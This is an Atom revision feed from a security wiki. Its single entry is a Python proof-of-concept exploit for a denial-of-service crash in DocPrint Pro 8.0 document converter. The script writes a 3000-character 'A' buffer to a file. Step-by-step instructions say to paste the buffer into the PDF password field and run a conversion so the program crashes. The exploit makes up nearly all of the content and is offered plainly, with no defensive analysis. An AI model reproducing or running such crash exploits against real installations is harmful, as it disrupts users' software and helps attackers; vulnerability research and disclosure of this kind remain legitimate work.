<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=DocPrint_Pro_8.0_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>DocPrint Pro 8.0 拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=DocPrint_Pro_8.0_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=DocPrint_Pro_8.0_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T20:40:19Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=DocPrint_Pro_8.0_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=2015&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; # -*- coding: utf-8 -*- # Exploit Title: Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC) # Date: 19/05/2019 # Author: Alejandra Sánchez # Vendo...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=DocPrint_Pro_8.0_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=2015&amp;oldid=prev"/>
		<updated>2021-05-02T04:35:35Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; # -*- coding: utf-8 -*- # Exploit Title: Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC) # Date: 19/05/2019 # Author: Alejandra Sánchez # Vendo...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# -*- coding: utf-8 -*-&lt;br /&gt;
# Exploit Title: Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC)&lt;br /&gt;
# Date: 19/05/2019&lt;br /&gt;
# Author: Alejandra Sánchez&lt;br /&gt;
# Vendor Homepage: http://www.verypdf.com&lt;br /&gt;
# Software: http://dl.verypdf.net/docprint_pro_setup.exe&lt;br /&gt;
# Version: 8.0&lt;br /&gt;
# Tested on: Windows 10&lt;br /&gt;
&lt;br /&gt;
# Proof of Concept:&lt;br /&gt;
# 1.- Run the python script &amp;quot;DocConverter.py&amp;quot;, it will create a new file &amp;quot;DocConverter.txt&amp;quot;&lt;br /&gt;
# 2.- Copy the text from the generated DocConverterr.txt file to clipboard&lt;br /&gt;
# 3.- Open docPrint Document Converter&lt;br /&gt;
# 4.- Go to 'Setting' &amp;gt; 'PDF Security'&lt;br /&gt;
# 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'&lt;br /&gt;
# 6.- Click on 'Add File(s)', and select a supported file, e.g. 'sample.doc'&lt;br /&gt;
# 7.- Click on 'Start', you will see a crash&lt;br /&gt;
&lt;br /&gt;
buffer = &amp;quot;\x41&amp;quot; * 3000&lt;br /&gt;
f = open (&amp;quot;DocConverter.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
f.write(buffer)&lt;br /&gt;
f.close()&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>